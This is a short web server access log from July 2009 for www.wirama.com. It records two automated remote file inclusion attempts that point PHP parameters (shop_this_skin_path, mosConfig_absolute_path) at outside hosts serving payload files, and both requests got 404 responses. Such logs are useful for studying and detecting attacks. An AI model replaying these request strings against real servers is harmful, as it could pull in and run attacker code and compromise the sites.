69.65.10.238 - - [02/Jul/2009:03:21:44 -0700] "GET /logs/access_090330.log/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://140.127.22.184/htaccess?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
217.22.227.138 - - [02/Jul/2009:04:04:04 -0700] "GET /logs/access_090331.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.adlerhorst-waldstadion.de/chat/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
